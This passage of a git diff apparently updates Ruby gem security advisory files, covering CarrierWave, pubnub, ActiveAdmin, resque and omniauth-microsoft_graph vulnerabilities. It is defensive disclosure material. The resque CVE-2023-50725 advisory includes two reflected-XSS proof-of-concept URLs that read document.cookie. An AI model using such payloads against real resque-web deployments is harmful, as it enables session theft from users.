-    [OWASP - File Upload Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/File_Upload_Cheat_Sheet.html#content-type-validation)
-  cvss_v3: 6.8
-  patched_versions:
-  - "~> 2.2.5"
-  - ">= 3.0.5"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2023-49090
-    - https://github.com/carrierwaveuploader/carrierwave/security/advisories/GHSA-gxhx-gq-49hj
-    - https://github.com/carrierwaveuploader/carrierwave/commit/39b282db5c1303899b3d3381ce8a837840f983b5
-    - https://github.com/carrierwaveuploader/carrierwave/commit/863d425c76eba12c3294227b39018f6b2dccbbf3
-    - https://github.com/carrierwaveuploader/carrierwave/blob/master/lib/carrierwave/uploader/content_type_allowlist.rb
-    - https://rubygems.org/gems/carrierwave/versions/2.2.5
-    - https://rubygems.org/gems/carrierwave/versions/3.0.5
-    - https://github.com/advisories/GHSA-gxhx-g4fq-49hj
----
+---
+layout: advisory
+title: 'CVE-2023-49090 (carrierwave): CarrierWave Content-Type allowlist bypass vulnerability,
+  possibly leading to XSS'
+comments: false
+categories:
+- carrierwave
+advisory:
+  gem: carrierwave
+  cve: 2023-49090
+  ghsa: gxhx-g4fq-49hj
+  url: https://github.com/carrierwaveuploader/carrierwave/security/advisories/GHSA-gxhx-g4fq-49hj
+  title: CarrierWave Content-Type allowlist bypass vulnerability, possibly leading
+    to XSS
+  date: 2023-11-29
+  description: |
+    ###Impact
+    [CarrierWave::Uploader::ContentTypeAllowlist](https://github.com/carrierwaveuploader/carrierwave/blob/master/lib/carrierwave/uploader/content_type_allowlist.rb)
+    has a Content-Type allowlist bypass vulnerability, possibly leading to XSS.
+
+    The validation in `allowlisted_content_type?` determines Content-Type
+    permissions by performing a partial match.
+    If the `content_type` argument of `allowlisted_content_type?` is passed
+    a value crafted by the attacker, Content-Types not included in the
+    `content_type_allowlist` will be allowed.
+
+    In addition, by setting the Content-Type configured by the attacker
+    at the time of file delivery, it is possible to cause XSS on the
+    user's browser when the uploaded file is opened.
+
+    ### Patches
+    Upgrade to [3.0.5](https://rubygems.org/gems/carrierwave/versions/3.0.5)
+    or [2.2.5](https://rubygems.org/gems/carrierwave/versions/2.2.5).
+
+    ### Workarounds
+    When validating with `allowlisted_content_type?` in
+    [CarrierWave::Uploader::ContentTypeAllowlist](https://github.com/carrierwaveuploader/carrierwave/blob/master/lib/carrierwave/uploader/content_type_allowlist.rb),
+    forward match(`\\A`) the Content-Type set in `content_type_allowlist`,
+    preventing unintentional permission of `text/html;image/png` when
+    you want to allow only `image/png` in `content_type_allowlist`.
+
+    ### References
+    [OWASP - File Upload Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/File_Upload_Cheat_Sheet.html#content-type-validation)
+  cvss_v3: 6.8
+  patched_versions:
+  - "~> 2.2.5"
+  - ">= 3.0.5"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-49090
+    - https://github.com/carrierwaveuploader/carrierwave/security/advisories/GHSA-gxhx-gq-49hj
+    - https://github.com/carrierwaveuploader/carrierwave/commit/39b282db5c1303899b3d3381ce8a837840f983b5
+    - https://github.com/carrierwaveuploader/carrierwave/commit/863d425c76eba12c3294227b39018f6b2dccbbf3
+    - https://github.com/carrierwaveuploader/carrierwave/blob/master/lib/carrierwave/uploader/content_type_allowlist.rb
+    - https://rubygems.org/gems/carrierwave/versions/2.2.5
+    - https://rubygems.org/gems/carrierwave/versions/3.0.5
+    - https://github.com/advisories/GHSA-gxhx-g4fq-49hj
+---
diff --git a/advisories/_posts/2023-12-06-CVE-2023-26154.md b/advisories/_posts/2023-12-06-CVE-2023-26154.md
index ffc999a8..952f9b04 100644
--- a/advisories/_posts/2023-12-06-CVE-2023-26154.md
+++ b/advisories/_posts/2023-12-06-CVE-2023-26154.md
@@ -1,60 +1,60 @@
----
-layout: advisory
-title: 'CVE-2023-26154 (pubnub): pubnub Insufficient Entropy vulnerability'
-comments: false
-categories:
-- pubnub
-advisory:
-  gem: pubnub
-  cve: 2023-26154
-  ghsa: 5844-q3fc-56rh
-  url: https://github.com/advisories/GHSA-5844-q3fc-56rh
-  title: pubnub Insufficient Entropy vulnerability
-  date: 2023-12-06
-  description: |
-    Versions of the package pubnub before 7.4.0; all versions of the
-    package com.pubnub:pubnub; versions of the package pubnub before
-    6.19.0; all versions of the package github.com/pubnub/go; versions
-    of the package github.com/pubnub/go/v7 before 7.2.0; versions of
-    the package pubnub before 7.3.0; versions of the package pubnub/pubnub
-    before 6.1.0; versions of the package pubnub before 5.3.0; versions
-    of the package pubnub before 0.4.0; versions of the package pubnub/c-core
-    before 4.5.0; versions of the package com.pubnub:pubnub-kotlin before
-    7.7.0; versions of the package pubnub/swift before 6.2.0; versions
-    of the package pubnub before 5.2.0; versions of the package pubnub
-    before 4.3.0 are vulnerable to Insufficient Entropy via the getKey
-    function, due to inefficient implementation of the AES-256-CBC
-    cryptographic algorithm. The provided encrypt function is less secure
-    when hex encoding and trimming are applied, leaving half of the bits
-    in the key always the same for every encoded message or file.
-
-    **Note:**
-
-    In order to exploit this vulnerability, the attacker needs to invest
-    resources in preparing the attack and brute-force the encryption.
-  cvss_v3: 5.9
-  patched_versions:
-  - ">= 5.3.0"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2023-26154
-    - https://github.com/pubnub/ruby/releases/tag/v5.3.0
-    - https://github.com/pubnub/javascript/commit/fb6cd0417cbb4ba87ea2d5d86a9c94774447e119
-    - https://gist.github.com/vargad/20237094fce7a0a28f0723d7ce395bb0
-    - https://github.com/pubnub/javascript/blob/master/src/crypto/modules/web.js#L70
-    - https://security.snyk.io/vuln/SNYK-COCOAPODS-PUBNUB-6098384
-    - https://security.snyk.io/vuln/SNYK-DOTNET-PUBNUB-6098372
-    - https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMPUBNUBGO-6098373
-    - https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMPUBNUBGOV7-6098374
-    - https://security.snyk.io/vuln/SNYK-JAVA-COMPUBNUB-6098371
-    - https://security.snyk.io/vuln/SNYK-JAVA-COMPUBNUB-6098380
-    - https://security.snyk.io/vuln/SNYK-JS-PUBNUB-5840690
-    - https://security.snyk.io/vuln/SNYK-PHP-PUBNUBPUBNUB-6098376
-    - https://security.snyk.io/vuln/SNYK-PUB-PUBNUB-6098385
-    - https://security.snyk.io/vuln/SNYK-PYTHON-PUBNUB-6098375
-    - https://security.snyk.io/vuln/SNYK-RUBY-PUBNUB-6098377
-    - https://security.snyk.io/vuln/SNYK-RUST-PUBNUB-6098378
-    - https://security.snyk.io/vuln/SNYK-SWIFT-PUBNUBSWIFT-6098381
-    - https://security.snyk.io/vuln/SNYK-UNMANAGED-PUBNUBCCORE-6098379
-    - https://github.com/advisories/GHSA-5844-q3fc-56rh
----
+---
+layout: advisory
+title: 'CVE-2023-26154 (pubnub): pubnub Insufficient Entropy vulnerability'
+comments: false
+categories:
+- pubnub
+advisory:
+  gem: pubnub
+  cve: 2023-26154
+  ghsa: 5844-q3fc-56rh
+  url: https://github.com/advisories/GHSA-5844-q3fc-56rh
+  title: pubnub Insufficient Entropy vulnerability
+  date: 2023-12-06
+  description: |
+    Versions of the package pubnub before 7.4.0; all versions of the
+    package com.pubnub:pubnub; versions of the package pubnub before
+    6.19.0; all versions of the package github.com/pubnub/go; versions
+    of the package github.com/pubnub/go/v7 before 7.2.0; versions of
+    the package pubnub before 7.3.0; versions of the package pubnub/pubnub
+    before 6.1.0; versions of the package pubnub before 5.3.0; versions
+    of the package pubnub before 0.4.0; versions of the package pubnub/c-core
+    before 4.5.0; versions of the package com.pubnub:pubnub-kotlin before
+    7.7.0; versions of the package pubnub/swift before 6.2.0; versions
+    of the package pubnub before 5.2.0; versions of the package pubnub
+    before 4.3.0 are vulnerable to Insufficient Entropy via the getKey
+    function, due to inefficient implementation of the AES-256-CBC
+    cryptographic algorithm. The provided encrypt function is less secure
+    when hex encoding and trimming are applied, leaving half of the bits
+    in the key always the same for every encoded message or file.
+
+    **Note:**
+
+    In order to exploit this vulnerability, the attacker needs to invest
+    resources in preparing the attack and brute-force the encryption.
+  cvss_v3: 5.9
+  patched_versions:
+  - ">= 5.3.0"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-26154
+    - https://github.com/pubnub/ruby/releases/tag/v5.3.0
+    - https://github.com/pubnub/javascript/commit/fb6cd0417cbb4ba87ea2d5d86a9c94774447e119
+    - https://gist.github.com/vargad/20237094fce7a0a28f0723d7ce395bb0
+    - https://github.com/pubnub/javascript/blob/master/src/crypto/modules/web.js#L70
+    - https://security.snyk.io/vuln/SNYK-COCOAPODS-PUBNUB-6098384
+    - https://security.snyk.io/vuln/SNYK-DOTNET-PUBNUB-6098372
+    - https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMPUBNUBGO-6098373
+    - https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMPUBNUBGOV7-6098374
+    - https://security.snyk.io/vuln/SNYK-JAVA-COMPUBNUB-6098371
+    - https://security.snyk.io/vuln/SNYK-JAVA-COMPUBNUB-6098380
+    - https://security.snyk.io/vuln/SNYK-JS-PUBNUB-5840690
+    - https://security.snyk.io/vuln/SNYK-PHP-PUBNUBPUBNUB-6098376
+    - https://security.snyk.io/vuln/SNYK-PUB-PUBNUB-6098385
+    - https://security.snyk.io/vuln/SNYK-PYTHON-PUBNUB-6098375
+    - https://security.snyk.io/vuln/SNYK-RUBY-PUBNUB-6098377
+    - https://security.snyk.io/vuln/SNYK-RUST-PUBNUB-6098378
+    - https://security.snyk.io/vuln/SNYK-SWIFT-PUBNUBSWIFT-6098381
+    - https://security.snyk.io/vuln/SNYK-UNMANAGED-PUBNUBCCORE-6098379
+    - https://github.com/advisories/GHSA-5844-q3fc-56rh
+---
diff --git a/advisories/_posts/2023-12-15-CVE-2023-50448.md b/advisories/_posts/2023-12-15-CVE-2023-50448.md
index c68ab9e0..ac3204d7 100644
--- a/advisories/_posts/2023-12-15-CVE-2023-50448.md
+++ b/advisories/_posts/2023-12-15-CVE-2023-50448.md
@@ -1,44 +1,44 @@
----
-layout: advisory
-title: 'CVE-2023-50448 (activeadmin): Potential CSV export data leak'
-comments: false
-categories:
-- activeadmin
-advisory:
-  gem: activeadmin
-  cve: 2023-50448
-  ghsa: 356j-hg45-x525
-  url: https://github.com/activeadmin/activeadmin/security/advisories/GHSA-356j-hg45-x525
-  title: Potential CSV export data leak
-  date: 2023-12-15
-  description: |2
-
-    ### Impact
-
-    In ActiveAdmin versions prior to 2.12.0, a concurrency issue was
-    found that could allow a malicious actor to be able to access
-    potentially private data that belongs to another user.
-
-    The bug affects the functionality to export data as CSV files, and
-    was caused by a variable holding the collection to be exported being
-    shared across threads and not properly synchronized.
-
-    The attacker would need access to the same ActiveAdmin application
-    as the victim, and could exploit the issue by timing their request
-    immediately before when they know someone else will request a CSV
-    (e.g. via phishing) or request CSVs frequently and hope someone
-    else makes a concurrent request.
-
-    ### Patches
-
-    Versions 2.12.0 and above fixed the problem by completely
-    removing the shared state.
-  cvss_v3: 8.4
-  patched_versions:
-  - ">= 2.12.0"
-  related:
-    url:
-    - https://github.com/activeadmin/activeadmin/security/advisories/GHSA-356j-hg45-x525
-    - https://github.com/advisories/GHSA-356j-hg45-x525
-  notes: No NVD or mention in repo for this CVE.
----
+---
+layout: advisory
+title: 'CVE-2023-50448 (activeadmin): Potential CSV export data leak'
+comments: false
+categories:
+- activeadmin
+advisory:
+  gem: activeadmin
+  cve: 2023-50448
+  ghsa: 356j-hg45-x525
+  url: https://github.com/activeadmin/activeadmin/security/advisories/GHSA-356j-hg45-x525
+  title: Potential CSV export data leak
+  date: 2023-12-15
+  description: |2
+
+    ### Impact
+
+    In ActiveAdmin versions prior to 2.12.0, a concurrency issue was
+    found that could allow a malicious actor to be able to access
+    potentially private data that belongs to another user.
+
+    The bug affects the functionality to export data as CSV files, and
+    was caused by a variable holding the collection to be exported being
+    shared across threads and not properly synchronized.
+
+    The attacker would need access to the same ActiveAdmin application
+    as the victim, and could exploit the issue by timing their request
+    immediately before when they know someone else will request a CSV
+    (e.g. via phishing) or request CSVs frequently and hope someone
+    else makes a concurrent request.
+
+    ### Patches
+
+    Versions 2.12.0 and above fixed the problem by completely
+    removing the shared state.
+  cvss_v3: 8.4
+  patched_versions:
+  - ">= 2.12.0"
+  related:
+    url:
+    - https://github.com/activeadmin/activeadmin/security/advisories/GHSA-356j-hg45-x525
+    - https://github.com/advisories/GHSA-356j-hg45-x525
+  notes: No NVD or mention in repo for this CVE.
+---
diff --git a/advisories/_posts/2023-12-18-CVE-2022-44303.md b/advisories/_posts/2023-12-18-CVE-2022-44303.md
index 6a39cbd5..e101efe7 100644
--- a/advisories/_posts/2023-12-18-CVE-2022-44303.md
+++ b/advisories/_posts/2023-12-18-CVE-2022-44303.md
@@ -1,52 +1,52 @@
----
-layout: advisory
-title: 'CVE-2022-44303 (resque-scheduler): Resque Scheduler Reflected XSS In Delayed
-  Jobs View'
-comments: false
-categories:
-- resque-scheduler
-advisory:
-  gem: resque-scheduler
-  cve: 2022-44303
-  ghsa: 9hmq-fm33-x4xx
-  url: https://github.com/resque/resque-scheduler/security/advisories/GHSA-9hmq-fm33-x4xx
-  title: Resque Scheduler Reflected XSS In Delayed Jobs View
-  date: 2023-12-18
-  description: |2
-
-    ### Impact
-
-    Resque Scheduler version 1.27.4 and above are affected by a cross-site
-    scripting vulnerability. A remote attacker can inject javascript code
-    to the "{schedule_job}" or "args" parameter in
-    /resque/delayed/jobs/{schedule_job}?args={args_id} to execute
-     javascript at client side.
-
-    ### Patches
-
-    Fixed in v4.10.2
-
-    ### Workarounds
-
-    No known workarounds at this time. It is recommended to not click on
-    3rd party or untrusted links to the resque-web interface until you
-    have patched your application.
-
-    ### References
-    * https://nvd.nist.gov/vuln/detail/CVE-2022-44303
-    * https://github.com/resque/resque-scheduler/issues/761
-    * https://github.com/resque/resque/issues/1885
-    * https://github.com/resque/resque-scheduler/pull/780
-    * https://github.com/resque/resque-scheduler/pull/783
-  cvss_v3: 6.3
-  unaffected_versions:
-  - "< 1.27.4"
-  patched_versions:
-  - ">= 4.10.2"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2022-44303
-    - https://github.com/resque/resque-scheduler/security/advisories/GHSA-9hmq-fm33-x4xx
-    - https://trungvm.gitbook.io/cves/resque/resque-1.27.4-multiple-reflected-xss-in-resque-schedule-job
-    - https://github.com/advisories/GHSA-9hmq-fm33-x4xx
----
+---
+layout: advisory
+title: 'CVE-2022-44303 (resque-scheduler): Resque Scheduler Reflected XSS In Delayed
+  Jobs View'
+comments: false
+categories:
+- resque-scheduler
+advisory:
+  gem: resque-scheduler
+  cve: 2022-44303
+  ghsa: 9hmq-fm33-x4xx
+  url: https://github.com/resque/resque-scheduler/security/advisories/GHSA-9hmq-fm33-x4xx
+  title: Resque Scheduler Reflected XSS In Delayed Jobs View
+  date: 2023-12-18
+  description: |2
+
+    ### Impact
+
+    Resque Scheduler version 1.27.4 and above are affected by a cross-site
+    scripting vulnerability. A remote attacker can inject javascript code
+    to the "{schedule_job}" or "args" parameter in
+    /resque/delayed/jobs/{schedule_job}?args={args_id} to execute
+     javascript at client side.
+
+    ### Patches
+
+    Fixed in v4.10.2
+
+    ### Workarounds
+
+    No known workarounds at this time. It is recommended to not click on
+    3rd party or untrusted links to the resque-web interface until you
+    have patched your application.
+
+    ### References
+    * https://nvd.nist.gov/vuln/detail/CVE-2022-44303
+    * https://github.com/resque/resque-scheduler/issues/761
+    * https://github.com/resque/resque/issues/1885
+    * https://github.com/resque/resque-scheduler/pull/780
+    * https://github.com/resque/resque-scheduler/pull/783
+  cvss_v3: 6.3
+  unaffected_versions:
+  - "< 1.27.4"
+  patched_versions:
+  - ">= 4.10.2"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-44303
+    - https://github.com/resque/resque-scheduler/security/advisories/GHSA-9hmq-fm33-x4xx
+    - https://trungvm.gitbook.io/cves/resque/resque-1.27.4-multiple-reflected-xss-in-resque-schedule-job
+    - https://github.com/advisories/GHSA-9hmq-fm33-x4xx
+---
diff --git a/advisories/_posts/2023-12-18-CVE-2023-50724.md b/advisories/_posts/2023-12-18-CVE-2023-50724.md
index 598e12b4..1c8b67e2 100644
--- a/advisories/_posts/2023-12-18-CVE-2023-50724.md
+++ b/advisories/_posts/2023-12-18-CVE-2023-50724.md
@@ -1,45 +1,45 @@
----
-layout: advisory
-title: 'CVE-2023-50724 (resque): Resque vulnerable to Reflected Cross Site Scripting
-  through pathnames'
-comments: false
-categories:
-- resque
-advisory:
-  gem: resque
-  cve: 2023-50724
-  ghsa: r8xx-8vm8-x6wj
-  url: https://github.com/resque/resque/security/advisories/GHSA-r8xx-8vm8-x6wj
-  title: Resque vulnerable to Reflected Cross Site Scripting through pathnames
-  date: 2023-12-18
-  description: |
-    ### Impact
-
-    resque-web in resque versions before 2.1.0 is vulnerable to reflected
-    XSS through the current_queue parameter in the path of the queues endpoint.
-
-    ### Patches
-
-    v2.1.0
-
-    ### Workarounds
-
-    No known workarounds at this time. It is recommended to not click
-    on 3rd party or untrusted links to the resque-web interface until
-    you have patched your application.
-
-    ### References
-
-    https://github.com/resque/resque/issues/1679
-    https://github.com/resque/resque/pull/1687
-  cvss_v3: 6.3
-  patched_versions:
-  - ">= 2.1.0"
-  related:
-    url:
-    - https://github.com/resque/resque/security/advisories/GHSA-r8xx-8vm8-x6wj
-    - https://github.com/resque/resque/issues/1679
-    - https://github.com/resque/resque/pull/1687
-    - https://github.com/resque/resque/commit/e8e2367fff6990d13109ec2483a456a05fbf9811
-    - https://github.com/advisories/GHSA-r8xx-8vm8-x6wj
----
+---
+layout: advisory
+title: 'CVE-2023-50724 (resque): Resque vulnerable to Reflected Cross Site Scripting
+  through pathnames'
+comments: false
+categories:
+- resque
+advisory:
+  gem: resque
+  cve: 2023-50724
+  ghsa: r8xx-8vm8-x6wj
+  url: https://github.com/resque/resque/security/advisories/GHSA-r8xx-8vm8-x6wj
+  title: Resque vulnerable to Reflected Cross Site Scripting through pathnames
+  date: 2023-12-18
+  description: |
+    ### Impact
+
+    resque-web in resque versions before 2.1.0 is vulnerable to reflected
+    XSS through the current_queue parameter in the path of the queues endpoint.
+
+    ### Patches
+
+    v2.1.0
+
+    ### Workarounds
+
+    No known workarounds at this time. It is recommended to not click
+    on 3rd party or untrusted links to the resque-web interface until
+    you have patched your application.
+
+    ### References
+
+    https://github.com/resque/resque/issues/1679
+    https://github.com/resque/resque/pull/1687
+  cvss_v3: 6.3
+  patched_versions:
+  - ">= 2.1.0"
+  related:
+    url:
+    - https://github.com/resque/resque/security/advisories/GHSA-r8xx-8vm8-x6wj
+    - https://github.com/resque/resque/issues/1679
+    - https://github.com/resque/resque/pull/1687
+    - https://github.com/resque/resque/commit/e8e2367fff6990d13109ec2483a456a05fbf9811
+    - https://github.com/advisories/GHSA-r8xx-8vm8-x6wj
+---
diff --git a/advisories/_posts/2023-12-18-CVE-2023-50725.md b/advisories/_posts/2023-12-18-CVE-2023-50725.md
index fba4ae38..7ed7c76f 100644
--- a/advisories/_posts/2023-12-18-CVE-2023-50725.md
+++ b/advisories/_posts/2023-12-18-CVE-2023-50725.md
@@ -1,48 +1,48 @@
----
-layout: advisory
-title: 'CVE-2023-50725 (resque): Resque vulnerable to reflected XSS in resque-web
-  failed and queues lists'
-comments: false
-categories:
-- resque
-advisory:
-  gem: resque
-  cve: 2023-50725
-  ghsa: gc3j-vvwf-4rp8
-  url: https://github.com/resque/resque/security/advisories/GHSA-gc3j-vvwf-4rp8
-  title: Resque vulnerable to reflected XSS in resque-web failed and queues lists
-  date: 2023-12-18
-  description: |
-    ### Impact
-
-    The following paths in resque-web have been found to be
-    vulnerable to reflected XSS:
-
-    ```
-    /failed/?class=<script>alert(document.cookie)</script>
-    /queues/><img src=a onerror=alert(document.cookie)>
-    ```
-
-    ### Patches
-
-    v2.2.1
-
-    ### Workarounds
-
-    No known workarounds at this time. It is recommended to not click
-    on 3rd party or untrusted links to the resque-web interface until
-    you have patched your application.
-
-    ### References
-
-    https://github.com/resque/resque/pull/1790
-  cvss_v3: 6.3
-  patched_versions:
-  - ">= 2.2.1"
-  related:
-    url:
-    - https://github.com/resque/resque/security/advisories/GHSA-gc3j-vvwf-4rp8
-    - https://github.com/resque/resque/pull/1790
-    - https://github.com/resque/resque/commit/ee99d2ed6cc75d9d384483b70c2d96d312115f07
-    - https://github.com/advisories/GHSA-gc3j-vvwf-4rp8
----
+---
+layout: advisory
+title: 'CVE-2023-50725 (resque): Resque vulnerable to reflected XSS in resque-web
+  failed and queues lists'
+comments: false
+categories:
+- resque
+advisory:
+  gem: resque
+  cve: 2023-50725
+  ghsa: gc3j-vvwf-4rp8
+  url: https://github.com/resque/resque/security/advisories/GHSA-gc3j-vvwf-4rp8
+  title: Resque vulnerable to reflected XSS in resque-web failed and queues lists
+  date: 2023-12-18
+  description: |
+    ### Impact
+
+    The following paths in resque-web have been found to be
+    vulnerable to reflected XSS:
+
+    ```
+    /failed/?class=<script>alert(document.cookie)</script>
+    /queues/><img src=a onerror=alert(document.cookie)>
+    ```
+
+    ### Patches
+
+    v2.2.1
+
+    ### Workarounds
+
+    No known workarounds at this time. It is recommended to not click
+    on 3rd party or untrusted links to the resque-web interface until
+    you have patched your application.
+
+    ### References
+
+    https://github.com/resque/resque/pull/1790
+  cvss_v3: 6.3
+  patched_versions:
+  - ">= 2.2.1"
+  related:
+    url:
+    - https://github.com/resque/resque/security/advisories/GHSA-gc3j-vvwf-4rp8
+    - https://github.com/resque/resque/pull/1790
+    - https://github.com/resque/resque/commit/ee99d2ed6cc75d9d384483b70c2d96d312115f07
+    - https://github.com/advisories/GHSA-gc3j-vvwf-4rp8
+---
diff --git a/advisories/_posts/2023-12-18-CVE-2023-50727.md b/advisories/_posts/2023-12-18-CVE-2023-50727.md
index 7ba399e2..9c83e0eb 100644
--- a/advisories/_posts/2023-12-18-CVE-2023-50727.md
+++ b/advisories/_posts/2023-12-18-CVE-2023-50727.md
@@ -1,42 +1,42 @@
----
-layout: advisory
-title: 'CVE-2023-50727 (resque): Resque vulnerable to reflected XSS in Queue Endpoint'
-comments: false
-categories:
-- resque
-advisory:
-  gem: resque
-  cve: 2023-50727
-  ghsa: r9mq-m72x-257g
-  url: https://github.com/resque/resque/security/advisories/GHSA-r9mq-m72x-257g
-  title: Resque vulnerable to reflected XSS in Queue Endpoint
-  date: 2023-12-18
-  description: |
-    ### Impact
-
-    Reflected XSS can be performed using the current_queue portion of
-    the path on the /queues endpoint of resque-web.
-
-    ### Patches
-
-    v2.6.0
-
-    ### Workarounds
-
-    No known workarounds at this time. It is recommended to not click
-    on 3rd party or untrusted links to the resque-web interface until
-    you have patched your application.
-
-    ### References
-
-    https://github.com/resque/resque/pull/1865
-  cvss_v3: 6.3
-  patched_versions:
-  - ">= 2.6.0"
-  related:
-    url:
-    - https://github.com/resque/resque/security/advisories/GHSA-r9mq-m72x-257g
-    - https://github.com/resque/resque/pull/1865
-    - https://github.com/resque/resque/commit/7623b8dfbdd0a07eb04b19fb25b16a8d6f087f9a
-    - https://github.com/advisories/GHSA-r9mq-m72x-257g
----
+---
+layout: advisory
+title: 'CVE-2023-50727 (resque): Resque vulnerable to reflected XSS in Queue Endpoint'
+comments: false
+categories:
+- resque
+advisory:
+  gem: resque
+  cve: 2023-50727
+  ghsa: r9mq-m72x-257g
+  url: https://github.com/resque/resque/security/advisories/GHSA-r9mq-m72x-257g
+  title: Resque vulnerable to reflected XSS in Queue Endpoint
+  date: 2023-12-18
+  description: |
+    ### Impact
+
+    Reflected XSS can be performed using the current_queue portion of
+    the path on the /queues endpoint of resque-web.
+
+    ### Patches
+
+    v2.6.0
+
+    ### Workarounds
+
+    No known workarounds at this time. It is recommended to not click
+    on 3rd party or untrusted links to the resque-web interface until
+    you have patched your application.
+
+    ### References
+
+    https://github.com/resque/resque/pull/1865
+  cvss_v3: 6.3
+  patched_versions:
+  - ">= 2.6.0"
+  related:
+    url:
+    - https://github.com/resque/resque/security/advisories/GHSA-r9mq-m72x-257g
+    - https://github.com/resque/resque/pull/1865
+    - https://github.com/resque/resque/commit/7623b8dfbdd0a07eb04b19fb25b16a8d6f087f9a
+    - https://github.com/advisories/GHSA-r9mq-m72x-257g
+---
diff --git a/advisories/_posts/2023-12-24-CVE-2023-51763.md b/advisories/_posts/2023-12-24-CVE-2023-51763.md
index ec2dd7d4..e04814cb 100644
--- a/advisories/_posts/2023-12-24-CVE-2023-51763.md
+++ b/advisories/_posts/2023-12-24-CVE-2023-51763.md
@@ -1,27 +1,27 @@
----
-layout: advisory
-title: 'CVE-2023-51763 (activeadmin): ActiveAdmin vulnerable to CSV injection'
-comments: false
-categories:
-- activeadmin
-advisory:
-  gem: activeadmin
-  cve: 2023-51763
-  ghsa: rqxc-9p8h-xqgq
-  url: https://github.com/advisories/GHSA-rqxc-9p8h-xqgq
-  title: ActiveAdmin vulnerable to CSV injection
-  date: 2023-12-24
-  description: |
-    csv_builder.rb in ActiveAdmin (aka Active Admin)
-    before 3.2.0 allows CSV injection.
-  cvss_v3: 8.4
-  patched_versions:
-  - ">= 3.2.0"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2023-51763
-    - https://github.com/activeadmin/activeadmin/releases/tag/v3.2.0
-    - https://github.com/activeadmin/activeadmin/pull/8161
-    - https://github.com/activeadmin/activeadmin/commit/697be2b183491beadc8f0b7d8b5bfb44f2387909
-    - https://github.com/advisories/GHSA-rqxc-9p8h-xqgq
----
+---
+layout: advisory
+title: 'CVE-2023-51763 (activeadmin): ActiveAdmin vulnerable to CSV injection'
+comments: false
+categories:
+- activeadmin
+advisory:
+  gem: activeadmin
+  cve: 2023-51763
+  ghsa: rqxc-9p8h-xqgq
+  url: https://github.com/advisories/GHSA-rqxc-9p8h-xqgq
+  title: ActiveAdmin vulnerable to CSV injection
+  date: 2023-12-24
+  description: |
+    csv_builder.rb in ActiveAdmin (aka Active Admin)
+    before 3.2.0 allows CSV injection.
+  cvss_v3: 8.4
+  patched_versions:
+  - ">= 3.2.0"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-51763
+    - https://github.com/activeadmin/activeadmin/releases/tag/v3.2.0
+    - https://github.com/activeadmin/activeadmin/pull/8161
+    - https://github.com/activeadmin/activeadmin/commit/697be2b183491beadc8f0b7d8b5bfb44f2387909
+    - https://github.com/advisories/GHSA-rqxc-9p8h-xqgq
+---
diff --git a/advisories/_posts/2024-01-03-CVE-2024-21632.md b/advisories/_posts/2024-01-03-CVE-2024-21632.md
index b1988751..35b13c84 100644
--- a/advisories/_posts/2024-01-03-CVE-2024-21632.md
+++ b/advisories/_posts/2024-01-03-CVE-2024-21632.md
@@ -1,34 +1,34 @@
----
-layout: advisory
-title: 'CVE-2024-21632 (omniauth-microsoft_graph): Omniauth::MicrosoftGraph Account
-  takeover (nOAuth)'
-comments: false
-categories:
-- omniauth-microsoft_graph
-advisory:
-  gem: omniauth-microsoft_graph
-  cve: 2024-21632
-  ghsa: 5g66-628f-7cvj
-  url: https://github.com/synth/omniauth-microsoft_graph/security/advisories/GHSA-5g66-628f-7cvj
-  title: Omniauth::MicrosoftGraph Account takeover (nOAuth)
-  date: 2024-01-03
-  description: |2
-
-    ### Summary
-    The implementation did not validate the legitimacy of the `email`
-    attribute of the user nor did it give/document an option to do so,
-    making it susceptible to [nOAuth](https://www.descope.com/blog/post/noauth)
-    misconfiguration in cases when the `email` is used as a trusted
-    user identifier
-  cvss_v3: 8.6
-  patched_versions:
-  - ">= 2.0.0"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-21632
-    - https://github.com/synth/omniauth-microsoft_graph/security/advisories/GHSA-5g66-628f-7cvj
-    - https://github.com/synth/omniauth-microsoft_graph/commit/5ffd62690ca0e46978f2fc7d83b18d28edde7795
-    - https://github.com/synth/omniauth-microsoft_graph/commit/f132078389612b797c872b45bd0e0b47382414c1
-    - https://www.descope.com/blog/post/noauth
-    - https://github.com/advisories/GHSA-5g66-628f-7cvj
----
+---
+layout: advisory
+title: 'CVE-2024-21632 (omniauth-microsoft_graph): Omniauth::MicrosoftGraph Account
+  takeover (nOAuth)'
+comments: false
+categories:
+- omniauth-microsoft_graph
+advisory:
+  gem: omniauth-microsoft_graph
+  cve: 2024-21632
+  ghsa: 5g66-628f-7cvj
+  url: https://github.com/synth/omniauth-microsoft_graph/security/advisories/GHSA-5g66-628f-7cvj
+  title: Omniauth::MicrosoftGraph Account takeover (nOAuth)
+  date: 2024-01-03
+  description: |2
+
+    ### Summary
+    The implementation did not validate the legitimacy of the `email`
+    attribute of the user nor did it give/document an option to do so,
+    making it susceptible to [nOAuth](https://www.descope.com/blog/post/noauth)
+    misconfiguration in cases when the `email` is used as a trusted
+    user identifier
+  cvss_v3: 8.6
+  patched_versions:
+  - ">= 2.0.0"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-21632
+    - https://github.com/synth/omniauth-microsoft_graph/security/advisories/GHSA-5g66-628f-7cvj
+    - https://github.com/synth/omniauth-microsoft_graph/commit/5ffd62690ca0e46978f2fc7d83b18d28edde7795
+    - https://github.com/synth/omniauth-microsoft_graph/commit/f132078389612b797c872b45bd0e0b47382414c1
+    - https://www.descope.com/blog/post/noauth
+    - https://github.com/advisories/GHSA-5g66-628f-7cvj
+---
diff --git a/advisories/_posts/2024-01-04-CVE-2024-21636.md b/advisories/_posts/2024-01-04-CVE-2024-21636.md
index 526488b0..5a785266 100644
